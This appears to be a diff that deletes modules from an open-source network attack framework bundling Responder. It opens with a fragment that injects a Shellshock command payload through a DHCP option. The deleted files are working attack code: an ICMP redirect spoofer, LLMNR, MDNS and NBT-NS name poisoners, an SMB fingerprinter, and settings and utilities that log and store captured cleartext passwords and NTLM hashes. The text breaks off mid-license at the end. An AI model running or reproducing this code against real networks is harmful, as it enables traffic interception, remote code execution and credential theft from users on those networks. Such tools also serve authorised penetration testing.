packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock)))
packet[DHCP].options.append("end")
else:
log.info("Sending DHCP ACK")
packet[DHCP].options.append("end")
self.s2.send(packet)

View file

@ -1,60 +0,0 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
from time import sleep
from core.logger import logger
from scapy.all import IP, ICMP, UDP, sendp
formatter = logging.Formatter("%(asctime)s [ICMPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ICMPpoisoner", formatter)
class ICMPpoisoner():
def __init__(self, options):
self.target = options.target
self.gateway = options.gateway
self.interface = options.interface
self.ip_address = options.ip
self.debug = False
self.send = True
self.icmp_interval = 2
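# Craft an ICMP redirect (type 5, code 1) from the gateway to the target pointing the new route at our IP; the embedded IP/UDP layers mimic the datagram that supposedly triggered it.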
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def start(self):
pkt = self.build_icmp()
t = threading.Thread(name='icmp_spoof', target=self.send_icmps, args=(pkt, self.interface, self.debug,))
t.setDaemon(True)
t.start()
def stop(self):
self.send = False
sleep(3)
def send_icmps(self, pkt, interface, debug):
while self.send:
sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug)

View file

@ -1,119 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import core.responder.settings as settings
import core.responder.fingerprint as fingerprint
import threading
from traceback import print_exc
from core.responder.packets import LLMNR_Ans
from core.responder.odict import OrderedDict
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPLLMNRServer(('', 5355), LLMNRServer)
t = threading.Thread(name='LLMNR', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting LLMNR server on port 5355: {}".format(e)
class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
MADDR = "224.0.0.252"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
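# Extract the queried name from a raw LLMNR request: the name length byte sits at offset 12 and the name immediately follows it.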
def Parse_LLMNR_Name(data):
NameLen = struct.unpack('>B',data[12])[0]
Name = data[13:13+NameLen]
return Name
def IsOnTheSameSubnet(ip, net):
net = net+'/24'
ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
netstr, bits = net.split('/')
netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
return (ipaddr & mask) == (netaddr & mask)
def IsICMPRedirectPlausible(IP):
dnsip = []
for line in file('/etc/resolv.conf', 'r'):
ip = line.split()
if len(ip) < 2:
continue
if ip[0] == 'nameserver':
dnsip.extend(ip[1:])
for x in dnsip:
if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] You can ICMP Redirect on this network.")
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x))
else:
pass
if settings.Config.AnalyzeMode:
IsICMPRedirectPlausible(settings.Config.Bind_To)
# LLMNR Server class
class LLMNRServer(BaseRequestHandler):
def handle(self):
data, soc = self.request
Name = Parse_LLMNR_Name(data)
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
else:
Finger = None
# Analyze Mode
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("{} [Analyze mode: LLMNR] Request for {}, ignoring".format(self.client_address[0], Name))
# Poisoning Mode
else:
Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
Buffer.calculate()
soc.sendto(str(Buffer), self.client_address)
settings.Config.PoisonersLogger.warning("{} [LLMNR] Poisoned request for name {}".format(self.client_address[0], Name))
if Finger is not None:
settings.Config.ResponderLogger.info("[FINGER] OS Version: {}".format(Finger[0]))
settings.Config.ResponderLogger.info("[FINGER] Client Version: {}".format(Finger[1]))

View file

@ -1,102 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import core.responder.settings as settings
import socket
import threading
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.packets import MDNS_Ans
from core.responder.utils import *
def start():
try:
server = ThreadingUDPMDNSServer(('', 5353), MDNSServer)
t = threading.Thread(name='MDNS', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting MDNS server on port 5353: {}".format(e)
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
MADDR = "224.0.0.251"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
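# Extract the queried name from a raw MDNS packet by walking the two length-prefixed labels that follow the 12-byte header.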
def Parse_MDNS_Name(data):
try:
data = data[12:]
NameLen = struct.unpack('>B',data[0])[0]
Name = data[1:1+NameLen]
NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
return Name+'.'+Name_
except IndexError:
return None
def Poisoned_MDNS_Name(data):
data = data[12:]
Name = data[:len(data)-5]
return Name
class MDNSServer(BaseRequestHandler):
def handle(self):
MADDR = "224.0.0.251"
MPORT = 5353
data, soc = self.request
Request_Name = Parse_MDNS_Name(data)
# Break out if we don't want to respond to this host
if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True):
return None
try:
# Analyze Mode
if settings.Config.AnalyzeMode:
if Parse_IPV6_Addr(data):
settings.Config.AnalyzeLogger.warning('{} [Analyze mode: MDNS] Request for {}, ignoring'.format(self.client_address[0], Request_Name))
# Poisoning Mode
else:
if Parse_IPV6_Addr(data):
Poisoned_Name = Poisoned_MDNS_Name(data)
Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
Buffer.calculate()
soc.sendto(str(Buffer), (MADDR, MPORT))
settings.Config.PoisonersLogger.warning('{} [MDNS] Poisoned answer for name {}'.format(self.client_address[0], Request_Name))
except Exception:
raise

View file

@ -1,99 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import threading
import core.responder.settings as settings
import core.responder.fingerprint as fingerprint
from core.responder.packets import NBT_Ans
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPServer(('', 137), NBTNSServer)
t = threading.Thread(name='NBTNS', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting NBTNS server on port 137: {}".format(e)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
# Define what we are answering to.
def Validate_NBT_NS(data):
if settings.Config.AnalyzeMode:
return False
if NBT_NS_Role(data[43:46]) == "File Server":
return True
if settings.Config.NBTNSDomain == True:
if NBT_NS_Role(data[43:46]) == "Domain Controller":
return True
if settings.Config.Wredirect == True:
if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
return True
else:
return False
# NBT_NS Server class.
class NBTNSServer(BaseRequestHandler):
def handle(self):
data, socket = self.request
Name = Decode_Name(data[13:45])
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x01\x10":
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
else:
Finger = None
# Analyze Mode
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("{} [Analyze mode: NBT-NS] Request for {}, ignoring".format(self.client_address[0], Name))
# Poisoning Mode
else:
Buffer = NBT_Ans()
Buffer.calculate(data)
socket.sendto(str(Buffer), self.client_address)
settings.Config.PoisonersLogger.warning("{} [NBT-NS] Poisoned answer for name {} (service: {})" .format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))
if Finger is not None:
settings.Config.ResponderLogger.info("[FINGER] OS Version : {}".format(Finger[0]))
settings.Config.ResponderLogger.info("[FINGER] Client Version : {}".format(Finger[1]))

View file

@ -1,68 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
import sys
import socket
import struct
import string
import logging
import settings  # needed for the fingerprint failure log below
from utils import *
from odict import OrderedDict
from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData
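# Parse the native OS and LanManager client strings out of a Session Setup AndX response.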
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45])[0]
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def RunSmbFinger(host):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.settimeout(0.7)
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(data = SMBNegoFingerData())
n.calculate()
Packet = str(h)+str(n)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
Body = SMBSessionFingerData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x73\x16":
return OsNameClientVersion(data)
except:
settings.Config.AnalyzeLogger.warning("Fingerprint failed for host: {}".format(host))
return None

View file

@ -1,117 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from UserDict import DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 argument, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end]
self.__map = {}
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
min(p==q for p, q in zip(self.items(), other.items()))
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other

File diff suppressed because it is too large Load diff

View file

@ -1,181 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import socket
import utils
import logging
from core.logger import logger
from core.configwatcher import ConfigWatcher
__version__ = 'Responder 2.2'
class Settings(ConfigWatcher):
def __init__(self):
self.ResponderPATH = os.path.dirname(__file__)
self.Bind_To = '0.0.0.0'
def __str__(self):
ret = 'Settings class:\n'
for attr in dir(self):
value = str(getattr(self, attr)).strip()
ret += " Settings.%s = %s\n" % (attr, value)
return ret
def toBool(self, str):
return True if str.upper() == 'ON' else False
def ExpandIPRanges(self):
def expand_ranges(lst):
ret = []
for l in lst:
tab = l.split('.')
x = {}
i = 0
for byte in tab:
if '-' not in byte:
x[i] = x[i+1] = int(byte)
else:
b = byte.split('-')
x[i] = int(b[0])
x[i+1] = int(b[1])
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
ret.append('%d.%d.%d.%d' % (a, b, c, d))
return ret
self.RespondTo = expand_ranges(self.RespondTo)
self.DontRespondTo = expand_ranges(self.DontRespondTo)
def populate(self, options):
# Servers
self.SSL_On_Off = self.toBool(self.config['Responder']['HTTPS'])
self.SQL_On_Off = self.toBool(self.config['Responder']['SQL'])
self.FTP_On_Off = self.toBool(self.config['Responder']['FTP'])
self.POP_On_Off = self.toBool(self.config['Responder']['POP'])
self.IMAP_On_Off = self.toBool(self.config['Responder']['IMAP'])
self.SMTP_On_Off = self.toBool(self.config['Responder']['SMTP'])
self.LDAP_On_Off = self.toBool(self.config['Responder']['LDAP'])
self.Krb_On_Off = self.toBool(self.config['Responder']['Kerberos'])
# Db File
self.DatabaseFile = './logs/responder/Responder.db'
# Log Files
self.LogDir = './logs/responder'
if not os.path.exists(self.LogDir):
os.mkdir(self.LogDir)
self.SessionLogFile = os.path.join(self.LogDir, 'Responder-Session.log')
self.PoisonersLogFile = os.path.join(self.LogDir, 'Poisoners-Session.log')
self.AnalyzeLogFile = os.path.join(self.LogDir, 'Analyzer-Session.log')
self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
self.IMAPLog = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt')
self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
self.LDAPNTLMv1Log = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv1Log = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv2Log = os.path.join(self.LogDir, 'HTTP-NTLMv2-Client-%s.txt')
self.KerberosLog = os.path.join(self.LogDir, 'MSKerberos-Client-%s.txt')
self.MSSQLNTLMv1Log = os.path.join(self.LogDir, 'MSSQL-NTLMv1-Client-%s.txt')
self.MSSQLNTLMv2Log = os.path.join(self.LogDir, 'MSSQL-NTLMv2-Client-%s.txt')
self.SMBNTLMv1Log = os.path.join(self.LogDir, 'SMB-NTLMv1-Client-%s.txt')
self.SMBNTLMv2Log = os.path.join(self.LogDir, 'SMB-NTLMv2-Client-%s.txt')
self.SMBNTLMSSPv1Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv1-Client-%s.txt')
self.SMBNTLMSSPv2Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv2-Client-%s.txt')
# HTTP Options
self.Serve_Exe = self.toBool(self.config['Responder']['HTTP Server']['Serve-Exe'])
self.Serve_Always = self.toBool(self.config['Responder']['HTTP Server']['Serve-Always'])
self.Serve_Html = self.toBool(self.config['Responder']['HTTP Server']['Serve-Html'])
self.Html_Filename = self.config['Responder']['HTTP Server']['HtmlFilename']
self.HtmlToInject = self.config['Responder']['HTTP Server']['HTMLToInject']
self.Exe_Filename = self.config['Responder']['HTTP Server']['ExeFilename']
self.Exe_DlName = self.config['Responder']['HTTP Server']['ExeDownloadName']
self.WPAD_Script = self.config['Responder']['HTTP Server']['WPADScript']
if not os.path.exists(self.Html_Filename):
print "Warning: %s: file not found" % self.Html_Filename
if not os.path.exists(self.Exe_Filename):
print "Warning: %s: file not found" % self.Exe_Filename
# SSL Options
self.SSLKey = self.config['Responder']['HTTPS Server']['SSLKey']
self.SSLCert = self.config['Responder']['HTTPS Server']['SSLCert']
# Respond to hosts
self.RespondTo = filter(None, [x.upper().strip() for x in self.config['Responder']['RespondTo'].strip().split(',')])
self.RespondToName = filter(None, [x.upper().strip() for x in self.config['Responder']['RespondToName'].strip().split(',')])
self.DontRespondTo = filter(None, [x.upper().strip() for x in self.config['Responder']['DontRespondTo'].strip().split(',')])
self.DontRespondToName = filter(None, [x.upper().strip() for x in self.config['Responder']['DontRespondToName'].strip().split(',')])
# CLI options
self.Interface = options.interface
self.Force_WPAD_Auth = options.forcewpadauth
self.LM_On_Off = options.lm
self.WPAD_On_Off = options.wpad
self.Wredirect = options.wredir
self.NBTNSDomain = options.nbtns
self.Basic = options.basic
self.Finger_On_Off = options.finger
self.AnalyzeMode = options.analyze
#self.Upstream_Proxy = options.Upstream_Proxy
self.Verbose = True
if options.log_level == 'debug':
self.Verbose = True
self.Bind_To = utils.FindLocalIP(self.Interface)
self.IP_aton = socket.inet_aton(self.Bind_To)
self.Os_version = sys.platform
# Set up Challenge
self.NumChal = self.config['Responder']['Challenge']
if len(self.NumChal) != 16:
print "The challenge must be exactly 16 chars long.\nExample: 1122334455667788"
sys.exit(-1)
self.Challenge = ""
for i in range(0, len(self.NumChal),2):
self.Challenge += self.NumChal[i:i+2].decode("hex")
# Set up logging
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
self.ResponderLogger = logger().setup_logger("Responder", formatter, self.SessionLogFile)
#logging.warning('Responder Started: {}'.format(self.CommandLine))
#logging.warning('Responder Config: {}'.format(self))
self.PoisonersLogger = logger().setup_logger("Poison log", formatter, self.PoisonersLogFile)
self.AnalyzeLogger = logger().setup_logger("Analyze Log", formatter, self.AnalyzeLogFile)
Config = Settings()

View file

@ -1,247 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import re
import logging
import socket
import time
import settings
import sqlite3
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
if len(settings.Config.RespondTo) and ClientIp not in settings.Config.RespondTo:
return False
if ClientIp in settings.Config.RespondTo or settings.Config.RespondTo == []:
if ClientIp not in settings.Config.DontRespondTo:
return True
return False
def RespondToThisName(Name):
if len(settings.Config.RespondToName) and Name.upper() not in settings.Config.RespondToName:
return False
if Name.upper() in settings.Config.RespondToName or settings.Config.RespondToName == []:
if Name.upper() not in settings.Config.DontRespondToName:
return True
return False
def RespondToThisHost(ClientIp, Name):
return (RespondToThisIP(ClientIp) and RespondToThisName(Name))
def IsOsX():
return True if settings.Config.Os_version == "darwin" else False
def OsInterfaceIsSupported():
if settings.Config.Interface != "Not set":
return False if IsOsX() else True
else:
return False
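# Find the IP address bound to a given interface by binding a throwaway UDP socket to it (SO_BINDTODEVICE, option 25) and reading back the source address chosen for a dummy connect to the discard service (RFC 863).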
def FindLocalIP(Iface):
if Iface == 'ALL':
return '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, 25, Iface+'\0')
s.connect(("127.0.0.1",9))#RFC 863
ret = s.getsockname()[0]
s.close()
return ret
except socket.error:
sys.exit(-1)
# Function used to write captured hashes to a file.
def WriteData(outfile, data, user):
settings.Config.ResponderLogger.info("[*] Captured Hash: %s" % data)
if os.path.isfile(outfile) == False:
with open(outfile,"w") as outf:
outf.write(data)
outf.write("\n")
outf.close()
else:
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
filestr.close()
return False
if re.search(re.escape("$"), user):
filestr.close()
return False
with open(outfile,"a") as outf2:
outf2.write(data)
outf2.write("\n")
outf2.close()
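# Persist a captured credential: create the sqlite DB on first use, append the JtR-style hash to a per-client log file, and only record/print entries not already seen for this module/type/user combination (unless verbose).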
def SaveToDb(result):
# Creating the DB if it doesn't exist
if not os.path.exists(settings.Config.DatabaseFile):
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.execute('CREATE TABLE responder (timestamp varchar(32), module varchar(16), type varchar(16), client varchar(32), hostname varchar(32), user varchar(32), cleartext varchar(128), hash varchar(512), fullhash varchar(512))')
cursor.commit()
cursor.close()
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
if len(result['user']) < 2:
return
if len(result['cleartext']):
fname = '%s-%s-ClearText-%s.txt' % (result['module'], result['type'], result['client'])
else:
fname = '%s-%s-%s.txt' % (result['module'], result['type'], result['client'])
timestamp = time.strftime("%d-%m-%Y %H:%M:%S")
logfile = os.path.join('./logs/responder', fname)
cursor = sqlite3.connect(settings.Config.DatabaseFile)
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['user']))
(count,) = res.fetchone()
if count == 0:
# Write JtR-style hash string to file
with open(logfile,"a") as outf:
outf.write(result['fullhash'])
outf.write("\n")
outf.close()
# Update database
cursor.execute("INSERT INTO responder VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)", (timestamp, result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
cursor.commit()
cursor.close()
# Print output
if count == 0 or settings.Config.Verbose:
if len(result['client']):
settings.Config.ResponderLogger.info("[%s] %s Client : %s" % (result['module'], result['type'], result['client']))
if len(result['hostname']):
settings.Config.ResponderLogger.info("[%s] %s Hostname : %s" % (result['module'], result['type'], result['hostname']))
if len(result['user']):
settings.Config.ResponderLogger.info("[%s] %s Username : %s" % (result['module'], result['type'], result['user']))
# By order of priority, print cleartext, fullhash, or hash
if len(result['cleartext']):
settings.Config.ResponderLogger.info("[%s] %s Password : %s" % (result['module'], result['type'], result['cleartext']))
elif len(result['fullhash']):
settings.Config.ResponderLogger.info("[%s] %s Hash : %s" % (result['module'], result['type'], result['fullhash']))
elif len(result['hash']):
settings.Config.ResponderLogger.info("[%s] %s Hash : %s" % (result['module'], result['type'], result['hash']))
else:
settings.Config.PoisonersLogger.warning('Skipping previously captured hash for %s' % result['user'])
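# Despite the name, this checks the query type in the last four bytes of the request: answer A (0x0001) and ANY (0x00ff) queries, ignore AAAA and anything else.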
def Parse_IPV6_Addr(data):
if data[len(data)-4:len(data)][1] == "\x1c":
return False
elif data[len(data)-4:len(data)] == "\x00\x01\x00\x01":
return True
elif data[len(data)-4:len(data)] == "\x00\xff\x00\x01":
return True
else:
return False
def Decode_Name(nbname):
#From http://code.google.com/p/dpkt/ with author's permission.
try:
from string import printable
if len(nbname) != 32:
return nbname
l = []
for i in range(0, 32, 2):
l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf)))
return filter(lambda x: x in printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
except:
return "Illegal NetBIOS name"
def NBT_NS_Role(data):
Role = {
"\x41\x41\x00":"Workstation/Redirector",
"\x42\x4c\x00":"Domain Master Browser",
"\x42\x4d\x00":"Domain Controller",
"\x42\x4e\x00":"Local Master Browser",
"\x42\x4f\x00":"Browser Election",
"\x43\x41\x00":"File Server",
"\x41\x42\x00":"Browser",
}
return Role[data] if data in Role else "Service not known"
# Useful for debugging
def hexdump(src, l=0x16):
res = []
sep = '.'
src = str(src)
for i in range(0, len(src), l):
s = src[i:i+l]
hexa = ''
for h in range(0,len(s)):
if h == l/2:
hexa += ' '
h = s[h]
if not isinstance(h, int):
h = ord(h)
h = hex(h).replace('0x','')
if len(h) == 1:
h = '0'+h
hexa += h + ' '
hexa = hexa.strip(' ')
text = ''
for c in s:
if not isinstance(c, int):
c = ord(c)
if 0x20 <= c < 0x7F:
text += chr(c)
else:
text += sep
res.append(('%08X: %-'+str(l*(2+1)+1)+'s |%s|') % (i, hexa, text))
return '\n'.join(res)

View file

@ -1,224 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
